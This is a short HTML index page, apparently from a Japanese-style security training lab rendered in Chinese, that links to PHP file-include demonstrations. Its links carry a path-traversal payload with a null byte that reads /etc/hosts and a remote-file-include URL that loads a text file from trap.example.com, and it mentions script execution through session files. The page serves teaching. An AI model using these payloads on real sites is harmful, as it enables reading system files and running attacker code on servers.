<html>
<head><title>4-13 include 相关的问题</title></head>
<body>
4-13 include 相关的问题
<ol>
<li><a href="4d-001.php?header=spring">4d-001:文件include（正常情况）</a></li>
<li><a href="4d-001.php?header=../../../../etc/hosts%00">4d-001:文件include（显示/etc/hosts文件内容）</a></li>
<li><a href="4d-001.php?header=http://trap.example.com/4d/4d-900.txt?">4d-001:文件include（RFI）</a></li>
<li><a href="4d-002.html">4d-002:文件include（经由session文件执行脚本）</a></li>
</ol>
<a href="phpinfo.php">phpinfo</a><br>
<a href="/">返回首页</a>
</body>
</html>

